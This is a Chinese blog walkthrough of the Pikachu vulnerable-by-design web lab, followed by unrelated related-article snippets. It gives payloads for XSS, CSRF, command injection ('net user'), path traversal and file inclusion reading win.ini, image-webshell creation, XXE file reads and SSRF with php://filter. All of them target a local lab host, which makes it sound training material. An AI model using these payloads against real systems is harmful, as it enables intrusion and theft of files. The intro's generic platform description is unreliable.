当前位置: 首页 > news >正文

pikachu[皮卡丘] 靶场全级别通关教程答案 以及 学习方法 如何通过渗透测试靶场挑战「pikachu」来精通Web渗透技巧? 一篇文章搞完这些问题

目录

Pikachu靶场

部署

暴力破解漏洞

学习地址:

靶场练习:

基于表单的暴力破解

验证码绕过(on server)

验证码绕过(on Client)

token防爆破?

XSS跨站脚本攻击

学习地址:

靶场练习:

反射型xss(get)

反射性xss(post)

存储型xss

DOM型xss

xss盲打

xss之过滤

xss之htmlspecialchars

xss之href输出

xss之js输出

CSRF 跨站脚本伪造攻击

学习地址:

靶场练习:

CSRF(get) login

CSRF(post)

CSRF Token

SQL注入漏洞

直接参考这SQL注入漏洞文章:

REC命令注入漏洞

学习地址:

靶场练习:

ping || net user

exec "eval"

文件包含漏洞

学习地址:

靶场练习:

本地文件包含

远程文件包含

文件下载漏洞

学习地址:

靶场练习:

不安全的文件下载

文件上传漏洞

学习地址:

靶场学习:

客户端check(检查)

服务端check

getimagesize() 

越权漏洞

学习地址:

靶场学习:

op1 member(水平越权)

op2 login(垂直越权)

目录穿越漏洞

学习地址:

靶场学习:

../../

敏感目录泄露漏洞

学习地址:

靶场学习:

find abc

反序列化漏洞

学习地址:

靶场学习:

PHP反序列化PHP反序列化

XEE漏洞(外部实现注入)

学习地址:

靶场学习:

xxe漏洞

SSRF 服务器伪造攻击

学习地址:

靶场学习:

不安全的URL跳转

SSRF(curl)

SSRF(file_get_content)


Pikachu靶场

Pikachu靶场(Pikachu CTF)是一个用于安全学习和渗透测试训练的在线靶场。它通常由网络安全爱好者和专业人员用来提高自己的安全技术,包括但不限于漏洞分析、逆向工程、Web安全、加密解密等方面。

Pikachu靶场的特点

  1. 多样的挑战:靶场通常包括一系列的安全挑战,涵盖不同的安全领域,适合初学者和高级渗透测试人员。
  2. 互动性:用户可以在线提交解题方案,并在挑战过程中获得实时反馈。
  3. 开源:一些版本的Pikachu靶场是开源的,用户可以自行部署,进行自定义配置。
  4. 学习社区:Pikachu靶场通常有一个学习社区,参与者可以分享经验、解题技巧,甚至挑战自己设计的问题。

下载和访问

  • Pikachu靶场的下载链接和访问方式可能会随时间有所变动,因此我建议你搜索它的最新版本或官方信息。
  • 你可以在GitHub或类似平台上搜索Pikachu CTF,查看是否有相关的开源项目。
git clone https://github.com/Pikachu-CTF/Pikachu.git
cd Pikachu

例如,你可以在GitHub上搜索 "Pikachu CTF" 或直接访问一些在线CTF平台,如 CTFtimeHack The Box,这些平台经常提供相关的靶场和挑战内容。


部署

  • 网上一大堆 这个自己百度 google即可


暴力破解漏洞

学习地址:

渗透测试暴力破解之 【多次搞搞你】 大家对这个技术都熟悉都喜欢玩这个,这篇文章就教会你如何玩暴力破解哦!_渗透测试双因子-CSDN博客

Web渗透测试之暴力破解高阶手法 表单破解 限制绕过-CSDN博客

靶场练习:

基于表单的暴力破解

  • 使用BP发送到攻击器 进行表单暴力破解

  • 查看字段长度判断暴力破解的成功

验证码绕过(on server)

  • 抓包服务端验证可能会存在时间限制
  • 所以可以在这段时间暴力破解
  • 验证码在后台不过期

  • 破解成功 服务端验证码校验


验证码绕过(on Client)


token防爆破?

  • 这个查看这篇文章 中的【暴力破解之token值】有讲这种手法如何破解

Web渗透测试之暴力破解高阶手法 表单破解 限制绕过-CSDN博客文章浏览阅读1.1w次,点赞9次,收藏29次。破解mysql:简单来说就是将密码进行逐个推算直到找出真正的密码为止暴力破解分类:暴力破解需要考虑的问题:持续不断发送尝试登录的请求用户名 字典。密码字典。基于不同的响应信息来判断是否正确。任何的暴力破解都是要基于用户名密码字典的强大与否 任何一天都能破解成功。暴力破解分BS 和 CS。字典大家也可以去网上找还可能找到各种web服务器应用程序的账号密码字典github等等一些地方。判断是否有复杂密码随便找到一个网站,https://blog.csdn.net/zhzx123aa/article/details/145061493https://blog.csdn.net/zhzx123aa/article/details/145061493https://blog.csdn.net/zhzx123aa/article/details/145061493https://blog.csdn.net/zhzx123aa/article/details/145061493https://blog.csdn.net/zhzx123aa/article/details/145061493https://blog.csdn.net/zhzx123aa/article/details/145061493https://blog.csdn.net/zhzx123aa/article/details/145061493


XSS跨站脚本攻击

学习地址:

XSS-Web渗透测试 最全面的XSS跨站脚本注入知识点给你说说的明明白白 多篇文章持续更新-CSDN博客

靶场练习:


反射型xss(get)

删除字符限制

输入: <ScRipT>alert('XSS')</ScRiPt>


反射性xss(post)

抓包:

  • admin
  • 123456

  • 提交xss:
  • <script>alert('xss')</script>

退出再登陆


存储型xss

  • 输入xss:
  • <script>alert('xss')</script>


DOM型xss

输入xss:

' onclick=alert('xss')>

闭合语句:

<a href='' onclick=alert(‘xss’)>'>what do you see?</a>


xss盲打

盲打一般都是打后台 

提交以后无反应 进入后台查看

http://ip/pikachu/vul/xss/xssblind/admin_login.php

登陆到后台查看 就跑出来了XSS 这也就是盲打


xss之过滤

也就是waf绕过的相关方式方法

<a href="" onclick="alert('xss')">


xss之htmlspecialchars

实体编码绕过参考这篇文章:Web渗透测试之XSS跨站脚本攻击 一篇文章实体编码以及伪协议Javascript给你说明白-CSDN博客

' onclick='alert("xss")


xss之href输出

伪协议

javascript:alert(1)


xss之js输出

</script><script>alert('xss')</script>


CSRF 跨站脚本伪造攻击

学习地址:

渗透测试之什么叫 CSRF【跨站脚本伪造】攻击手法OR防御手简单教会你玩玩 钓鱼手法呀-CSDN博客

靶场练习:

CSRF(get) login

随便登陆一个用户 

生成poc

  • 生成poc点击后 在含有cookie的浏览器登陆 这样受害者数据就被修改了
  • 这样就是跨站脚本伪造了


CSRF(post)

  • 和get方式方法一样 只是请求的方法不一样


CSRF Token

  • 暴力破解中使用的token原理
  •  这个查看这篇文章 中的【暴力破解之token值】有讲这种手法如何破解
  • Web渗透测试之暴力破解高阶手法 表单破解 限制绕过-CSDN博客文章浏览阅读1.1w次,点赞9次,收藏29次。破解mysql:简单来说就是将密码进行逐个推算直到找出真正的密码为止暴力破解分类:暴力破解需要考虑的问题:持续不断发送尝试登录的请求用户名 字典。密码字典。基于不同的响应信息来判断是否正确。任何的暴力破解都是要基于用户名密码字典的强大与否 任何一天都能破解成功。暴力破解分BS 和 CS。字典大家也可以去网上找还可能找到各种web服务器应用程序的账号密码字典github等等一些地方。判断是否有复杂密码随便找到一个网站,https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118

SQL注入漏洞

直接参考这SQL注入漏洞文章:

https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482

  • 这篇文章融合了sql注入的所有知识点
  • 其中每个sql注入知识点的案例都是用的pikachu中sql注入靶场案例 直接参看就可以了

REC命令注入漏洞

学习地址:

渗透测试之远程命令执行漏洞示例 RCE-CSDN博客

靶场练习:

ping || net user

ping || net user


exec "eval"

phpinfo();


文件包含漏洞

学习地址:

渗透测试之文件包含漏洞 超详细的文件包含漏洞文章-CSDN博客

靶场练习:

本地文件包含

  • 命令:

http://192.168.1.6/pikachu/vul/fileinclude/fi_local.php?filename=file2.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

  • 读取本地文件
?filename=C:/../../../../Windows\win.ini&submit=提交查询


远程文件包含

http://192.168.1.6/pikachu/vul/fileinclude/fi_remote.php?filename=http://www.baidu.com&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

  • 比如说我们本地搭建了一个程序 编写了一个webshell,然后通过远程文件包含漏洞访问本地搭建的服务中的webshell文件,实现对肉鸡的控制。

文件下载漏洞

学习地址:

渗透测试之 文件读取漏洞结合目录穿越漏洞[---]搞定文件下载漏洞 获取敏感文件进入后渗透的模式-CSDN博客

靶场练习:


不安全的文件下载

  • 点击文件名称 抓包

  1. GET /pikachu/vul/unsafedownload/execdownload.php?filename=pj.png HTTP/1.1
  2. 通过文件包含漏洞路径创越下载
  3. 这个是通过web目录扫描 找到项目结构 找到文件,然后通过文件下载漏洞 下载对应文件。 
execdownload.php?filename=../../../index.php


文件上传漏洞

学习地址:

渗透测试之 任意文件上传漏洞 以及 绕过方式 详解_文件上传漏洞图片绕过-CSDN博客

靶场学习:

客户端check(检查)


服务端check

  • 抓包
  • 修改Content-Type: text/html 这个牵扯到 Mime 类型看一下上面的文章


getimagesize() 

  • getimagesize() 是php的一个函数

  • 其余的语言也有类似的函数 检测图片是不是一张真的图片

  • 为什么要做这样的检测?道理很简单

  • 因为图片不是一张真的图片就可以存在图片马【图片中含有一句话木马】

生成图片马

copy copy /b 图片.jpg + 木马.php 合成的文件名.jpg

  • 上传图片马加上文件包含漏洞读取这样的漏洞


越权漏洞

学习地址:

渗透测试之越权漏洞详解 水平越权 垂直越权 目录越权 SQL跨库查询越权 以及未授权漏洞 一篇文章说明白-CSDN博客

靶场学习:

op1 member(水平越权)

看一下url路径 含有用户名称 修改这个用户名称

http://192.168.1.6/pikachu/vul/overpermission/op1/op1_mem.php?username=lucy&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF


op2 login(垂直越权)

准备普通用户

准备超级管理用户添加用户

把普通用户的userID 转到 管理员的UserID 如果成功则普通用户可以操作管理员的行为


目录穿越漏洞

学习地址:

渗透测试之 文件读取漏洞结合目录穿越漏洞[---]搞定文件下载漏洞 获取敏感文件进入后渗透的模式-CSDN博客

靶场学习:

../../

url地址

http://192.168.1.6/pikachu/vul/dir/dir_list.php?title=jarheads.php

目录创越读取文件

?title=C:../../../../../../windows\win.ini

http://192.168.1.6/pikachu/vul/dir/dir_list.php?title=C:../../../../../../windows\win.ini


敏感目录泄露漏洞

学习地址:

靶场学习:

find abc

查看页面源码


反序列化漏洞

学习地址:

靶场学习:

PHP反序列化PHP反序列化

<?php
class S{var $test="<script>alert(document.cookie)</script>";
}$a=new S();
echo serialize($a)
?>


XEE漏洞(外部实现注入)

学习地址:

渗透测试之XEE[外部实体注入]漏洞 原理 攻击手法 xml语言结构 防御手法-CSDN博客

靶场学习:

xxe漏洞

payload

<?xml version="1.0"?>
<!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>
<a>&xxe;</a>


SSRF 服务器伪造攻击

学习地址:

渗透测试之SSRF漏洞原理 危害 产生的原因 探测手法 防御手法 绕过手法 限制的手段_ssrf 绕过ftp限制-CSDN博客

靶场学习:

不安全的URL跳转

?url=http://www.baidu.com

成功跳转到百度页面


SSRF(curl)

http://192.168.1.6/pikachu/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php

读取文件 ssrf伪造攻击


SSRF(file_get_content)

 这里的利用方式与上一关相同,不同一点是这里可以使用php的伪协议了

比如,可以使用php://filter读取文件

?file=PHP://filter/read=convert.base64-encode/resource=c:../../../windows/win.ini


喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。

相关文章:

pikachu[皮卡丘] 靶场全级别通关教程答案 以及 学习方法 如何通过渗透测试靶场挑战「pikachu」来精通Web渗透技巧? 一篇文章搞完这些问题

目录 Pikachu靶场 部署 暴力破解漏洞 学习地址: 靶场练习: 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on Client) token防爆破? XSS跨站脚本攻击 学习地址: 靶场练习&#xff1a; 反射型xss(get) 反射性xss(post) 存储型xss DOM型xss xss盲打 x…...

ai智能DeepSeek 在 Cursor 中的配置与应用实践

DeepSeek 是一款高效的深度搜索引擎&#xff0c;能够为开发者提供更智能、更精准的搜索体验。在数据量大、查询复杂的场景中&#xff0c;DeepSeek 能够帮助提升查询的响应速度和精确度。本文将介绍 DeepSeek 在 Cursor 中的配置与应用&#xff0c;帮助开发者理解如何在实际开发…...

登录到docker里

在Docker中登录到容器通常有两种情况&#xff1a; 登录到正在运行的容器内部&#xff1a;如果你想要进入到正在运行的容器内部&#xff0c;可以使用docker exec命令。 登录到容器中并启动一个shell&#xff1a;如果你想要启动一个容器&#xff0c;并在其中启动一个shell&…...

【大数据技术】搭建完全分布式高可用大数据集群(Kafka)

搭建完全分布式高可用大数据集群(Kafka) kafka_2.13-3.9.0.tgz注:请在阅读本篇文章前,将以上资源下载下来。 写在前面 本文主要介绍搭建完全分布式高可用集群 Kafka 的详细步骤。 注意: 统一约定将软件安装包存放于虚拟机的/software目录下,软件安装至/opt目录下。 安…...

Java 大视界 -- Java 大数据在智能供应链中的应用与优化(76)

&#x1f496;亲爱的朋友们&#xff0c;热烈欢迎来到 青云交的博客&#xff01;能与诸位在此相逢&#xff0c;我倍感荣幸。在这飞速更迭的时代&#xff0c;我们都渴望一方心灵净土&#xff0c;而 我的博客 正是这样温暖的所在。这里为你呈上趣味与实用兼具的知识&#xff0c;也…...

10.单例模式 (Singleton Pattern)

单例模式的定义 单例模式&#xff08;Singleton Pattern&#xff09; 是一种创建型设计模式&#xff0c;确保一个类在整个程序生命周期中只能有一个实例&#xff0c;并提供一个全局访问点。 特点&#xff1a; 唯一性&#xff1a;保证系统中某个类只能有一个实例。全局访问点…...

Docker 常见问题解决方法

云原生学习路线导航页&#xff08;持续更新中&#xff09; kubernetes学习系列快捷链接 Kubernetes架构原则和对象设计&#xff08;一&#xff09;Kubernetes架构原则和对象设计&#xff08;二&#xff09;Kubernetes架构原则和对象设计&#xff08;三&#xff09;Kubernetes常…...

QT-面试

1. C&#xff08;特别是 Qt&#xff09;开发中&#xff0c;内存优化的方法 1. 合理管理对象生命周期&#xff0c;使用智能指针 Qt 提供了 QScopedPointer 和 QSharedPointer 来管理对象生命周期&#xff0c;避免手动 delete 导致的内存泄漏。 2. 减少内存占用 QString、QBy…...

使用java代码操作rabbitMQ收发消息

SpringAMQP 将来我们开发业务功能的时候&#xff0c;肯定不会在控制台收发消息&#xff0c;而是应该基于编程的方式。由于RabbitMQ采用了AMQP协议&#xff0c;因此它具备跨语言的特性。任何语言只要遵循AMQP协议收发消息&#xff0c;都可以与RabbitMQ交互。并且RabbitMQ官方也…...

LeetCode 128: 最长连续序列

LeetCode 128: 最长连续序列 题目: 给定一个未排序的整数数组 nums &#xff0c;找出数字连续的最长序列&#xff08;不要求序列元素在原数组中连续&#xff09;的长度。 请你设计并实现时间复杂度为 O(n) 的算法解决此问题。 示例 1&#xff1a; 输入&#xff1a;nums […...

Shapefile格式文件解析和显示

Java实现GIS SHP文件格式的解析和显示&#xff0c;JDK19下编译&#xff0c;awt图形系统显示。 SHP文件对应的属性存储在DBF格式数据库中&#xff0c;解析见&#xff1a;DBASE DBF数据库文件解析_数据库文件在线解析-CSDN博客 解析SHP文件代码&#xff1a; public static Shap…...

华为昇腾Altas产品查询——常用命令汇总记录

参考链接&#xff1a; 【2024第一期CANN训练营】Altas产品查询CANN软件包版本等信息npu-smi Atlas 中心训练服务器 6.0.0 NPU驱动和固件安装指南 06 Ascend Extension for PyTorch插件软件版本配套表 以下操作适用于查询npu设备的基本信息。 #查询所有设备的基本信息 npu-smi…...

韶音科技:消费电子行业售后服务实现数字化转型,重塑客户服务体系

韶音科技&#xff1a;消费电子行业售后服务实现数字化转型&#xff0c;重塑客户服务体系 在当今这个科技日新月异的时代&#xff0c;企业之间的竞争早已超越了单纯的产品质量比拼&#xff0c;**售后服务成为了衡量消费电子行业各品牌实力与客户满意度的关键一环。**深圳市韶音…...

【R语言】plyr包和dplyr包

一、plyr包 plyr扩展包主要是实现数据处理中的“分割-应用-组合”&#xff08;split-apply-combine&#xff09;策略。此策略是指将一个问题分割成更容易操作的部分&#xff0c;再对每一部分进行独立的操作&#xff0c;最后将各部分的操作结果组合起来。 plyr扩展包中的主要函…...

开发一款类似《王者荣耀》的游戏是一个复杂的系统工程,涉及多个领域的知识和技术。以下是从多个角度详细阐述如何开发的思维。

一、明确游戏定位与核心玩法 游戏类型 MOBA&#xff08;Multiplayer Online Battle Arena&#xff09;&#xff1a;强调团队合作、策略性和即时战斗。确定游戏模式&#xff08;如5v5、3v3等&#xff09;和地图设计。 核心玩法 角色设计&#xff1a;英雄技能、属性、成长曲线。…...

harmonyOS生命周期详述

harmonyOS的生命周期分为app(应用)的生命周期和页面的生命周期函数两部分 应用的生命周期-app应用 在app.js中写逻辑,具体有哪些生命周期函数呢,请看下图: onCreated()、onShow()、onHide()、onDestroy()这五部分 页面及组件生命周期 着重说下onShow和onHide,分别代表是不是…...

Deepseek本地部署指南:在linux服务器部署,在mac远程web-ui访问

1. 在Linux服务器上部署DeepSeek模型 要在 Linux 上通过 Ollama 安装和使用模型&#xff0c;您可以按照以下步骤进行操作&#xff1a; 步骤 1&#xff1a;安装 Ollama 安装 Ollama&#xff1a; 使用以下命令安装 Ollama&#xff1a; curl -sSfL https://ollama.com/download.…...

ESP8266+STM32+阿里云保姆级教程(AT指令+MQTT)

前言&#xff1a;在开发过程中&#xff0c;几乎踩便了所有大坑小坑总结出的文章&#xff0c;我是把坑踩满了&#xff0c;帮助更过小白快速上手&#xff0c;如有错误之处&#xff0c;还麻烦各位大佬帮忙指正、 目录 一、ESP-01s介绍 1、ESP-01s管脚功能&#xff1a; 模组启动模…...

【蓝桥杯嵌入式】4_key:单击+长按+双击

全部代码网盘自取 链接&#xff1a;https://pan.baidu.com/s/1PX2NCQxnADxYBQx5CsOgPA?pwd3ii2 提取码&#xff1a;3ii2 1、电路图 将4个按键的引脚设置为input&#xff0c;并将初始状态设置为Pull-up&#xff08;上拉输入&#xff09; 为解决按键抖动的问题&#xff0c;我们…...

TCP队头阻塞问题以及QUIC解决方案

TCP队头阻塞(Head-of-Line Blocking)问题 问题描述 TCP是面向字节流的可靠传输协议,要求数据按严格顺序到达接收端。若某个数据包在传输过程中丢失、延迟或乱序,会导致以下问题: 后续数据被阻塞:接收端必须等待丢失/延迟的包重传并正确接收后,才能将后续已到达的数据交…...

idea启动报错# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00007ffccf76e433

# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc0x00007ffccf76e433, pid17288, tid6696 # # JRE version: (11.0.248) (build ) # Java VM: OpenJDK 64-Bit Server VM (11.0.248-LTS, mixed mode, sharing, tiered, compressed oops, g1 gc, windows-amd64) 不知道为什么…...

如何利用Python爬虫获取商品销量详情:应对eBay反爬策略的实战指南与代码示例

在当今数据驱动的商业环境中&#xff0c;获取商品销量数据对于市场分析、竞品研究和商业决策至关重要。然而&#xff0c;像eBay这样的大型电商平台通常会部署多种反爬虫机制来保护其数据。本文将详细介绍如何利用Python编写爬虫程序&#xff0c;获取eBay商品的销量详情&#xf…...

激活函数篇 03 —— ReLU、LeakyReLU、RandomizedLeakkyReLU、PReLU、ELU

本篇文章收录于专栏【机器学习】 以下是激活函数系列的相关的所有内容: 一文搞懂激活函数在神经网络中的关键作用 逻辑回归&#xff1a;Sigmoid函数在分类问题中的应用 整流线性单位函数&#xff08;Rectified Linear Unit, ReLU&#xff09;&#xff0c;又称修正线性单元&a…...

算法基础之八大排序

文章目录 概要1. 冒泡排序&#xff08;Bubble Sort&#xff09;2. 选择排序&#xff08;Selection Sort&#xff09;3. 插入排序&#xff08;Insertion Sort&#xff09;4. 希尔排序&#xff08;Shell Sort&#xff09;5. 归并排序&#xff08;Merge Sort&#xff09;6. 快速排…...

通达OA /mysql/index.php 未授权访问漏洞

通达OA /mysql/index.php 未授权访问漏洞 漏洞描述 通达OA 未授权访问phpmyadmin漏洞&#xff0c;攻击者无需帐号密码可直接访问phpmyadmin&#xff0c;造成数据库泄漏。攻击者可操作数据库执行sql语句&#xff0c;执行恶意操作&#xff0c;进行一步攻击。 威胁等级: 高危 …...

每日学习 设计模式 五种不同的单例模式

狮子大佬原文 https://blog.csdn.net/weixin_40461281/article/details/135050977 第一种 饿汉式 为什么叫饿汉,指的是"饿" 也就是说对象实例在程序启动时就已经被创建好,不管你是否需要,它都会在类加载时立即实例化,也就是说 实例化是在类加载时候完成的,早早的吃…...

C++类和对象

目录 一、类的定义 1.1、类定义格式 1.2、访问限定符 1.3、类域 二、实例化 2.1、实例化概念 2.2、对象大小 三、this指针 四、类的默认成员 4.1、构造函数 4.2、析构函数 4.3、拷贝构造 4.4、赋值运算符重载 4.4.1、运算符重载 4.4.2、赋值运算符重载 4.5、日…...

AI知识库和全文检索的区别

1、AI知识库的作用 AI知识库是基于人工智能技术构建的智能系统&#xff0c;能够理解、推理和生成信息。它的核心作用包括&#xff1a; 1.1 语义理解 自然语言处理&#xff08;NLP&#xff09;&#xff1a;AI知识库能够理解用户查询的语义&#xff0c;而不仅仅是关键词匹配。 …...

docker常用命令及案例

以下是 Docker 的所有常用命令及其案例说明&#xff0c;按功能分类整理&#xff1a; 1. 镜像管理 1.1 拉取镜像 命令: docker pull <镜像名>:<标签>案例: 拉取官方的 nginx 镜像docker pull nginx:latest1.2 列出本地镜像 命令: docker images案例: 查看本地所有…...

webpack【初体验】使用 webpack 打包一个程序

打包前 共 3 个文件 dist\index.html <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>Webpack 示例&…...

让office集成deepseek,支持office和WPS办公软件!(体验感受)

导读 AIGC:AIGC是一种新的人工智能技术&#xff0c;它的全称是Artificial Intelligence Generative Content&#xff0c;即人工智能生成内容。 它是一种基于机器学习和自然语言处理的技术&#xff0c;能够自动产生文本、图像、音频等多种类型的内容。这些内容可以是新闻文章、…...

初始数据结构☞复杂度与泛式

一.时间复杂度 定义&#xff1a; 算法的时间复杂度是一个数学函数&#xff0c;算法中的基本操作的执行次数&#xff0c;为算法的时间复杂度。 O渐进表示方法&#xff1a; 原因&#xff1a; 计算时间复杂度时&#xff0c;我们其实并不一定要计算精确的执行次数&#xff0c;而…...

理解UML中的四种关系:依赖、关联、泛化和实现

在软件工程中&#xff0c;统一建模语言&#xff08;UML&#xff09;是一种广泛使用的工具&#xff0c;用于可视化、设计、构造和文档化软件系统。UML提供了多种图表类型&#xff0c;如类图、用例图、序列图等&#xff0c;帮助开发者和设计师更好地理解系统的结构和行为。在UML中…...

go语言中的反射

为什么会引入反射 有时我们需要写一个函数&#xff0c;这个函数有能力统一处理各种值类型&#xff0c;而这些类型可能无法共享同一个接口&#xff0c;也可能布局未知&#xff0c;也有可能这个类型在我们设计函数时还不存在&#xff0c;这个时候我们就可以用到反射。 空接口可…...

【前端】打造自己的hexo博客_hexo一本通

今日更新完毕&#xff0c;建议关注收藏点赞&#xff01; 目录 打造自己的hexo blog挂载到自己的github主页设计自己的theme 打造自己的hexo blog #需要安装git node.js 这里略#安装hexo npm install -g hexo-cli npm install hexo hexo help#<folder>必须是空的 hexo in…...

剪辑学习整理

文章目录 1. 剪辑介绍 1. 剪辑介绍 剪辑可以干什么&#xff1f;剪辑分为哪些种类&#xff1f; https://www.bilibili.com/video/BV15r421p7aF/?spm_id_from333.337.search-card.all.click&vd_source5534adbd427e3b01c725714cd93961af 学完剪辑之后如何找工作or兼职&#…...

储能系统-系统架构

已更新系列文章包括104、61850、modbus 、单片机等&#xff0c;欢迎关注 IEC61850实现方案和测试-1-CSDN博客 快速了解104协议-CSDN博客 104调试工具2_104协议调试工具-CSDN博客 1 电池储能系统&#xff08;BESS&#xff09; 架构 电池储能系统主要包括、电池、pcs、本地控制…...

程序员也可以这样赚钱

最近有朋友和我交流了关于程序员副业的想法&#xff0c;我想借这个机会对目前软件开发常用的兼职平台做一个梳理。 以下是程序员接副业的靠谱平台推荐&#xff0c;结合政策合规性、平台口碑及实际操作性整理&#xff0c;覆盖国内外主流选择&#xff1a; 一、国内综合型平台 程序…...

STM32启动过程概述

1. STM32启动过程概述 STM32 微控制器的启动过程是指从上电或复位开始&#xff0c;到系统开始执行用户程序的整个过程。这个过程包括了硬件初始化、引导加载程序 (Bootloader) 执行、系统时钟配置、外设初始化等步骤。 2. STM32 启动的基本流程 上电或复位 STM32 芯片的启动过…...

Elasticsearch去分析目标服务器的日志,需要在目标服务器上面安装Elasticsearch 软件吗

Elasticsearch 本身并不直接收集目标服务器的日志&#xff0c;它主要用于存储、搜索和分析数据。要收集目标服务器的日志&#xff0c;通常会借助其他工具&#xff0c;并且一般不需要在目标服务器上安装 Elasticsearch 软件&#xff0c;常见的日志收集方案&#xff1a; Filebeat…...

Linux:软硬链接和动静态库

hello&#xff0c;各位小伙伴&#xff0c;本篇文章跟大家一起学习《Linux&#xff1a;软硬链接和动静态库》&#xff0c;感谢大家对我上一篇的支持&#xff0c;如有什么问题&#xff0c;还请多多指教 &#xff01; 如果本篇文章对你有帮助&#xff0c;还请各位点点赞&#xff0…...

C# 比较两个List集合内容是否相同

在 C# 中&#xff0c;要比较两个 List<T> 集合的内容是否相同&#xff0c;可以通过以下几种方法&#xff1a; 一、非自定义类的元素比较 1. 使用 SequenceEqual 方法&#xff08;顺序和内容都相等&#xff09; 顺序和内容都相等&#xff1a;使用 SequenceEqual。 usin…...

IDEA中Resolving Maven dependencies卡着不动解决方案

一、修改settings.xml Maven配置阿里云仓库主要通过修改Maven的settings.xml文件来实现‌。以下是具体步骤: ‌1、找到settings.xml文件‌: 通常位于Maven安装目录下的conf文件夹中,或者在用户目录下的.m2文件夹中(如果用户自定义了settings.xml的位置)。 2、‌编辑se…...

重生之我要当云原生大师(十一)访问Linux文件系统

目录 一、解释下文件系统、块设备、挂载点、逻辑卷。 二、简述文件系统、块设备、挂载点、逻辑卷之间的关系&#xff1f; 三、如何检查文件系统&#xff1f; 四、挂载和卸载文件系统的流程&#xff1f; 五、find命令都可以根据什么查找文件。 一、解释下文件系统、块设备、…...

驱动开发系列34 - Linux Graphics Intel 动态显存技术的实现

一:概述 动态显存技术(Dynamic Video Memory Technology, DVMT)是一种由 Intel 提出的内存分配技术,主要用于整合显卡(集成显卡)系统中,以便动态地调整显存大小,从而在不同的负载场景下优化内存使用和系统性能。 动态显存技术的核心在于共享系统内存。集成显卡没有独立…...

feign 远程调用详解

在平常的开发工作中&#xff0c;我们经常需要跟其他系统交互&#xff0c;比如调用用户系统的用户信息接口、调用支付系统的支付接口等。那么&#xff0c;我们应该通过什么方式进行系统之间的交互呢&#xff1f;今天&#xff0c;简单来总结下 feign 的用法。 1&#xff1a;引入依…...

HTML5 应用程序缓存

HTML5 应用程序缓存 引言 随着互联网技术的飞速发展,移动设备的普及,用户对于网页的加载速度和离线访问的需求日益增长。HTML5 应用程序缓存(Application Cache,简称AppCache)应运而生,它允许开发者将网页资源存储在本地,从而实现网页的快速加载和离线访问。本文将详细…...

7.PPT:“中国梦”学习实践活动【20】

目录 NO1234​ NO5678​ NO9\10\11 NO1234 考生文件夹下创建一个名为“PPT.pptx”的新演示文稿Word素材文档的文字&#xff1a;复制/挪动→“PPT.pptx”的新演示文稿&#xff08;蓝色、黑色、红色&#xff09; 视图→幻灯片母版→重命名&#xff1a;“中国梦母版1”→背景样…...

利用NestJS构建高效的RESTful API接口

1. 引言 项目背景与目标 随着互联网应用的快速发展,RESTful API已成为前后端分离架构中的重要组成部分。本文将介绍如何使用NestJS构建一个高效且可维护的RESTful API接口。目标是通过NestJS的模块化和依赖注入特性,实现一个易于扩展和维护的API系统。 RESTful API的重要性…...

YOLOv11实时目标检测 | 摄像头视频图片文件检测

在上篇文章中YOLO11环境部署 || 从检测到训练https://blog.csdn.net/2301_79442295/article/details/145414103#comments_36164492&#xff0c;我们详细探讨了YOLO11的部署以及推理训练&#xff0c;但是评论区的观众老爷就说了&#xff1a;“博主博主&#xff0c;你这个只能推理…...